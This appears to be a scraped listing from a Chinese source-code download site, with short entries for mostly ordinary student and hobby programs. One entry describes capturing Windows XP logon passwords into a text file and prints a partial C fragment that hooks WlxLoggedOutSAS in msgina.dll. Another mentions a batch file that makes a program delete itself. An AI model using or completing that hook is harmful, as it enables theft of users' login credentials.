-
汇编语言,用于统计输入的字符串中各个字符的个数。
汇编语言,用于统计输入的字符串中各个字符的个数。-country every word
- 2022-11-03 03:00:03下载
- 积分:1
-
模拟扑克牌的速算24游戏,vc++6.0编写,对于学习游戏编程很有帮助...
模拟扑克牌的速算24游戏,vc++6.0编写,对于学习游戏编程很有帮助-Poker simulation speed count 24 games, vc++ 6.0 to prepare for learning game programming helpful
- 2022-03-24 10:17:09下载
- 积分:1
-
CNC control software for C source, the PCB can be controlled carving machine use...
CNC控制软件为C源代码,可以控制PCB雕刻机使用,以大DIY生产成本无法使用
- 2023-01-12 00:50:04下载
- 积分:1
-
In the edit box enter the drawing commands, when you click " Drawing" b...
在编辑框输入绘图命令,当单击“绘图”按钮时,能在左边坐标轴绘制所对应的图形-In the edit box enter the drawing commands, when you click " Drawing" button, be able to draw on the left axis corresponds to the graphic
- 2022-03-15 07:50:20下载
- 积分:1
-
捕获窗口的源码,很不错呀,快
捕获窗口的源码,很不错呀,快-capture the source window, a very good game, fast
- 2022-03-11 02:46:55下载
- 积分:1
-
很有用的网络客户端与服务端接口,在实验中比较使用
很有用的网络客户端与服务端接口,在实验中比较使用-very using
- 2022-05-06 00:19:10下载
- 积分:1
-
一个很好的磁盘清理程序的源码
一个很好的磁盘清理程序的源码-a good disk clean-up procedures FOSS
- 2022-03-19 20:43:28下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
使用链式存储实现一元多项式的以下运算:
实现多项式的加法、减法、求导。...
使用链式存储实现一元多项式的以下运算:
实现多项式的加法、减法、求导。
-Used to achieve a dollar store chain polynomial of the following operations: the realization of polynomial addition, subtraction, derivation.
- 2022-03-09 08:56:39下载
- 积分:1
-
利用bat文件实现程序运行结束后自杀!
利用bat文件实现程序运行结束后自杀!-use bat documents achieving operating procedures after suicide!
- 2022-03-09 23:42:30下载
- 积分:1